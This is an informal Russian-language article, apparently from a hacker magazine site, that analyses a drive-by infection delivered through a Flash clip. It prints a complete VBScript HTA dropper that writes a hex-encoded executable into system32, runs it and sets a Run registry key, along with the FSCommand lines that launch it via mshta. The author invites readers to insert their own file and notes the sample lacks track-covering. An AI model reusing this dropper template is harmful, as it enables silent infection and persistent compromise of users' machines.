I am a man who walks alone
And when I'm walking a dark road
At night or scrolling through the park
When the light begins to change
I some times feel a little strange
A little anxiouns when it's dark
("Fear of the dark" Iron Maiden)

Здарова дружище вот решил с тобой потолковать на тему компьютерных
заболеваний. В одно из обычных путешествий по Inet'у я заметил, что мой
Осёл повесился, ну я подумал что это обычный сбой 98-х дверей от Гейтса.
Ну ребутнулся, конектинг снова вызвал тот же сбой. Лады, думаю, где там у
меня касперский завалялся. Каспер-про тоже подумал и заявил, что мол
нету у тебя заболеваний. Ну я ему не очень поверил и решил сам за него
поработать. Полез ACDSee'ей в Temporary Internet Files и там все
пощупал. Наткнулся на Flash ролик, после запуска которого вылетело окно hta приложение со странными
закорючками. Ага, подумал я, попался. Был подсажен вирь с
целью зомбирования моего компа.

Изучая данный файл (который довольно прост) можно увидеть, что сборка
exe вируса происходит на стороне клиента и после уже прописывает
себя в реестр Window. А вирус в свою очередь заносится в ядро винды.
Дейстие вируса направлено на создание ошибок в ОС.
Вирус запускается с помощью flash ролика. Любой Win9x пользователь,
посетивший страницу с данным flash-роликом, будет заражен.

Текст hta файла:

&v=<script language=vbs>Set o=CreateObject("Scripting.FileSystemObject") 
Set s=CreateObject("WScript.Shell") 
p=s.ExpandEnvironmentStrings("%WinDir%\system32\winvm32.exe") 
If not o.FileExists(p) Then 
t=Split("4D,5A,90,00,(... 
... // Здесь распологается тело exe файла в 16-ричном виде 
... // (что нам мешает свой файл вставить?) 
...)00,00,00",",") 
Set f=o.CreateTextFile(p,2) 
For i=0 To UBound(t) 
f.Write chr(Int("&H"&t(i))) 
Next 
f.Close 
s.run(p) 
s.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WinVM32",p,"REG_SZ" 
End If 
close()</script> 

Из Flash'а данный файл запускается командами Flash ActionScript:

FSCommand: save c:\temp.hta
FSCommand: exec mshta.exe c:\temp.hta

Просмотрев само тело собранного файла я обнаружил, что он сделан UPX Team
http://vpx.tsx.org. Cайт данной команды указывает на то что она занимается
системными ошибками. В данном примере не
хватает хотя бы батника для заметания следов.
Вот такие вот колдуны...

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии